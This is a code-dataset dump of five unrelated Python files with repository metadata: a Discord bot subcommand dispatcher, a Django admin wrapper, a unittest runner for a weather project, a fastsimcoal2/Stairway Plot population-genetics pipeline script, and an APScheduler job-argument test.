d1540c7319640ae2f754884f48d21e93116dfca5 | 8b0991e44dc5e10dc361bfa6afaad600fe04a212 | /classes/command/commandTree.py | b5d2972efdd9d09cf8969924150983b77de9b9e8 | [] | no_license | Cubiss/discord_bot | f3fd52eed075434bdd22de8e3ce1cdc42e0ba592 | 08686e067c4f9e0d2dc15c2c710c4eaf68694704 | refs/heads/master | 2023-06-24T08:37:32.900290 | 2023-06-11T22:20:50 | 2023-06-11T22:20:50 | 187,587,035 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,344 | py | import discord
import re
from classes.command.command import Command
from modules.users.users import Users
class CommandTree(Command):
    """A Command that dispatches to named child Commands (subcommands).

    Child name uniqueness is enforced across all children; dispatch happens
    via the kwargs produced by the matching regex capture groups.
    """

    def __init__(self, names: list, children: list, permissions=None, description=''):
        try:
            self.children = {}
            seen_names = set()
            for c in children:
                for n in c.names:
                    if n in seen_names:
                        raise Exception(f"Duplicate subcommand name: {n}")
                    seen_names.add(n)
                self.children[c.name] = c
            # self.regex = self.update_regexp()
            super(CommandTree, self).__init__(
                names=names, function=self.execute_branching, permissions=permissions, description=description)
        except Exception as ex:
            # Chain the underlying error so the real cause (e.g. the duplicate
            # name) is not lost; use the `names` argument because self.name is
            # only set by Command.__init__, which may not have run yet.
            raise Exception(f"CommandTree({names})") from ex

    def update_regexp(self):
        """Build a regex matching one of this command's names followed by any child's names."""
        c: Command
        children_names_regexes = []
        for subcommand_name, c in self.children.items():
            children_names_regexes.append(rf'(?P<{subcommand_name}>{"|".join(c.names)})')
        return re.compile(
            rf'(?P<command_name>{"|".join(self.names)})\s*(?P<subcommand>({"|".join(children_names_regexes)}).*)')

    async def execute_branching(self, subcommand, message: discord.Message, client: discord.Client, users: Users, log, **kwargs):
        """Run the first child whose capture group matched; returns None if none matched."""
        for subcommand_name in self.children:
            if kwargs[subcommand_name] is not None:
                return await self.children[subcommand_name].execute(message=message, client=client, users=users, log=log,
                                                                    text=subcommand)

    def build_usage(self):
        """Return a one-line usage string listing the allowed subcommand names."""
        return f'Allowed commands: {self.name} ({"|".join(self.children)})'

    async def send_help(self, message: discord.Message, names=None):
        """Send help for the subcommand path in `names`, falling back to this tree's own help.

        NOTE(review): mutates the caller's `names` list via pop(0).
        """
        if names is not None and len(names) > 0:
            name = names.pop(0)
            for c in self.children.values():
                if name in c.names:
                    return await c.send_help(message, names)
        return await super().send_help(message)

    def __repr__(self):
        if self.names is None or len(self.names) == 0:
            return f'<CommandTree() - uninitialized'
        else:
            return f'<CommandTree({self.name}) -> {repr(self.function)}>'
| [
"solin.jakub@gmail.com"
] | solin.jakub@gmail.com |
38e9ee343a79aadeb93fccf44df6b0895b4e837d | 0c437b16688cf5fd313c9fcb5ca68f6c9d4be1c1 | /virtualenv/bin/django-admin.py | acdcb95312250ee956decfa2ad9d3bdbb3e8d1b5 | [
"Apache-2.0"
] | permissive | piyush82/icclab-rcb-web | 53e81da8584cb1802de97f31b8dc9328c48445f9 | 4391a15ddfa73f5236246cb64fcb4216dff31816 | refs/heads/master | 2021-01-23T03:47:50.339450 | 2014-04-17T13:11:16 | 2014-04-17T13:11:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 155 | py | #!/Users/harh/Codes/Python/icclab-web/bin/python
from django.core import management

# Thin wrapper around Django's command-line utility — the classic
# project-local django-admin.py entry point.
if __name__ == "__main__":
    management.execute_from_command_line()
| [
"piyush.harsh@zhaw.ch"
] | piyush.harsh@zhaw.ch |
eea2209be92efd6a1637b8c110f3b87c6d9745e2 | 7154f9167ba8fca747ee2ae983ed2467949164a3 | /run_tests.py | 8117072484c1aff7ce07769e0eb63bfb77e073dd | [] | no_license | bel-lloyd/weather-project | e641a0631d14c661123614906dd47373d95cfcfd | 28f4174d710fb82529727adf42184ccb5cd19c53 | refs/heads/main | 2023-07-09T11:23:57.056896 | 2021-08-07T02:09:10 | 2021-08-07T02:09:10 | 392,278,471 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,096 | py | import unittest
from tests.test_convert_date import ConvertDateTests
from tests.test_convert_f_to_c import ConvertTempTests
from tests.test_calculate_mean import CalculateMeanTests
from tests.test_load_data_from_csv import LoadCSVTests
from tests.test_find_min import FindMinTests
from tests.test_find_max import FindMaxTests
from tests.test_generate_summary import GenerateSummaryTests
from tests.test_generate_daily_summary import GenerateDailySummaryTests
runner = unittest.TextTestRunner()
print("Running Tests...\n")
runner.run(unittest.TestSuite((unittest.makeSuite(ConvertDateTests))))
runner.run(unittest.TestSuite((unittest.makeSuite(ConvertTempTests))))
runner.run(unittest.TestSuite((unittest.makeSuite(CalculateMeanTests))))
runner.run(unittest.TestSuite((unittest.makeSuite(LoadCSVTests))))
runner.run(unittest.TestSuite((unittest.makeSuite(FindMinTests))))
runner.run(unittest.TestSuite((unittest.makeSuite(FindMaxTests))))
runner.run(unittest.TestSuite((unittest.makeSuite(GenerateSummaryTests))))
runner.run(unittest.TestSuite((unittest.makeSuite(GenerateDailySummaryTests))))
| [
"noreply@github.com"
] | bel-lloyd.noreply@github.com |
b1c959b0d7a3308bebf69ca2c44f5048ccea40be | 57d3aae331ff9f9907800a36eaff6c0f689b4217 | /Script files/Paprika.py | a33ef0628a985325e1660aaf158b425cd9db4b53 | [] | no_license | carolinelennartsson/PopulationGeneticsGroup6 | ceba82ae9cb08e144355833960ed9d0173874449 | 39bcc430f1dd5701f4b98d79b9136e39649a1497 | refs/heads/main | 2023-03-29T20:12:25.027102 | 2021-04-09T11:54:30 | 2021-04-09T11:54:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,987 | py | #!/usr/bin/env python
# Drive a fastsimcoal2 + Stairway Plot pipeline and collect the resulting
# plots and per-run summaries under ../Results/.
# Import libraries.
import os
import argparse

# Get input arguments.
parser = argparse.ArgumentParser()
parser.add_argument("-par", "--param_file", help="Input parameter file for fastsimcoal2")
parser.add_argument("-i", "--iter_num", help="Number of iterations to use for fastsimcoal2")
args = parser.parse_args()

# NOTE(review): argument values are interpolated into shell command lines
# unquoted; paths containing spaces or shell metacharacters will break or be
# unsafe. Consider subprocess.run([...]) with an argument list.

# Run fastsimcoal2.
os.system("fsc26 -i {parameters} -n {iterations} -I -s 0 -d -T".format(parameters=args.param_file, iterations=args.iter_num))

# Delete the seed file left behind by fastsimcoal2.
os.system("rm seed.txt")

# Create SFS plots. The run id is the parameter file's base name without its extension.
obs_file = args.param_file.split('.')[-2].split('/')[-1]
os.system("Rscript plot_sfs.R --path ./{obs}/{obs}_DAFpop0.obs --id {obs}".format(obs=obs_file))
os.system("mv sfs_{obs}.png ../Results/".format(obs=obs_file))

# Create stairway summary.
os.system("bash ~/groupdirs/SCIENCE-BIO-popgen_course-project/Group6_Simulations1/version02/script/stairway.sh ~/groupdirs/SCIENCE-BIO-popgen_course-project/Group6_Simulations1/Scripts/{obs}/{obs}_DAFpop0.obs ~/groupdirs/SCIENCE-BIO-popgen_course-project/Group6_Simulations1/Results 10000000 {obs} {iterations} ~/groupdirs/SCIENCE-BIO-popgen_course-project/Group6_Simulations1/Parameters/parameter.txt".format(obs=obs_file, iterations=args.iter_num))

# Collect the final summaries over all the runs.
# os.makedirs replaces the previous bare `try: os.system("mkdir ...") except: pass`:
# os.system never raises on failure, so that except clause was dead code, and
# exist_ok=True handles the directory already existing.
os.makedirs("../Results/{}_summaries".format(obs_file), exist_ok=True)

for i in range(1, int(args.iter_num) + 1):
    os.system("cp ../Results/{o}.{it}/{o}.{it}.final.summary ../Results/{o}_summaries/".format(o=obs_file, it=i))

os.system("Rscript ~/groupdirs/SCIENCE-BIO-popgen_course-project/Group6_Simulations1/Scripts/plot_stairway_ggplot.R --inputpath ~/groupdirs/SCIENCE-BIO-popgen_course-project/Group6_Simulations1/Results/{obs_file}_summaries/ --outputfilename ~/groupdirs/SCIENCE-BIO-popgen_course-project/Group6_Simulations1/Results/{obs_file}_summaries/{obs_file} --title {obs_file}".format(obs_file=obs_file))
| [
"noreply@github.com"
] | carolinelennartsson.noreply@github.com |
ae9c18ed187a23fb7121a34ca1422020e3f7ddb5 | 20343e8a8435b3f839d5abd0c4063cf735f43341 | /Experiment/CornerDetectAndAutoEmail/AveMaxMinDetect/test/test1.py | c4133dfbbcbb80c2cf4a4201fd7522e512561360 | [] | no_license | alading241/MoDeng | 948f2099e2f7e4548d6e477b6e06b833bdf4f9bb | 01819e58943d7d1a414714d64aa531c0e99dfe22 | refs/heads/master | 2021-05-23T11:39:41.326804 | 2020-04-05T06:06:01 | 2020-04-05T06:06:01 | 253,269,397 | 1 | 0 | null | 2020-04-05T15:38:33 | 2020-04-05T15:38:33 | null | UTF-8 | Python | false | false | 476 | py | # encoding = utf-8
import tornado
from apscheduler.schedulers.tornado import TornadoScheduler
sched = TornadoScheduler()
""" 测试向任务中传入参数 """
test = 'hello'
def job1(a, b, c):
print("job1:", a,b,c)
def job2(a, b, c):
print("job2:", a,b,c)
sched.add_job(job1, 'interval', seconds=1, args=["e", "t", "f"])
sched.add_job(job2, 'interval', seconds=1, kwargs={"a": test, "b": "b", "c": "c"})
sched.start()
tornado.ioloop.IOLoop.instance().start()
| [
"1210055099@qq.com"
] | 1210055099@qq.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.